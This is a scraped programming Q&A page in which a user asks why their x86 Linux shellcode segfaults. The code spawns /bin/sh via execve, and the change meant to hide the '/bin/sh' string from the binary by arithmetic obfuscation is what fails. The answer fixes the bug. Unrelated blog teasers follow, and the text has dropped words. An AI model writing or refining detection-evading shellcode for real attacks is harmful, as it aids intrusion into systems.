linux - Segmentation fault by replacing an instruction with another that does the same job. Why? -

-

i have working shellcode spawns shell have modify such hide "/bin/sh" or "sh" coming anywhere in binary after compiling. have hence thought of taking hex value of /bin/sh(2f 62 69 6e 2f 73 68) adding random value 0x11111 , moving value register, subtracting 0x11111 @ runtime , pushing runtime generated value(which becomes /bin/sh) stack , doing execv segmentation fault on 1st step itself. , unable figure out why?

this below code works fine.

section .data  section .text     global _start _start:  xor eax,eax cdq push eax push long 0x68732f2f push long 0x6e69622f mov ebx,esp push eax push ebx mov ecx,esp mov al,0xb xor edx,edx int 0x80

but change causes segmentation fault

section .data  section .text     global _start _start:  xor eax,eax cdq push eax mov ecx,0x11111 mov ebx,0x68744040 sub ebx,ecx push long eax push long 0x6e69622f mov ebx,esp push eax push ebx mov ecx,esp mov al,0xb xor edx,edx int 0x80

please me on thie. greatful. thanks

the code different, isn't it? here:

sub ebx,ecx push long eax

you compute ebx-ecx, push eax. , eax zero.

it should be:

sub ebx,ecx push long ebx

Comments

Post a Comment

Popular posts from this blog

objective c - Change font of selected text in UITextView -

-
can suggest me how change font of selected text in uitextview.i cannot use uiwebview since have edit text. have seen pages app.how possible in app. see formatting text within uilabel differently . since need editing, should @ javascript-based editors such ckeditor or tinymce . highly recommend wwdc 2011 video session 511: "rich text editing in safari on ios."
Read more

php - Accessing POST data in Facebook cavas app -

-
so i've got simple form in canvas / iframe facebook app, , i'm trying pass along values post. reading on s.o. , fb's latest docs, understand it, data send via post form can accessed on receiving end $_request object. i read on thread on s.o. in order post forms work need pass along input named "signed_request" value current signed_request (i have signed request working ok otherwise...all login , authentication stuff working fine). isnt mentioned anywhere in official fb docs. so problem comes in $_request object signed request, , bunch of other session stuff. form inputs found. the way can read them set method of form "request" isn't real form method. takes of inputs , sends them args in url. horrible. here's sample page canvas app form i'm using try debug (leaving out authentication stuff): <form enctype="application/x-www-form-urlencoded" method="post" target="_top" id="my_form" action=...
Read more

c# - Getting control value when switching a view as part of a multiview -

-
i have following code in aspx page: <asp:button id="display_button" runat="server" text="display" onclick="button1_click" /> &nbsp; <asp:button id="edit_button" runat="server" text="edit" onclick="button2_click" /> &nbsp; <asp:button id="save_button" runat="server" text="save" onclick="button3_click" visible="false" /> &nbsp; <asp:multiview id="multiview1" runat="server" activeviewindex="0"> <asp:view id="view1" runat="server"> <asp:formview id="view_program" runat="server"> <itemtemplate> <%# eval("status").tostring().trim() %> </itemtemplate> </asp:formview> </asp:view> <asp:view id="view2" runat="server"> ...
Read more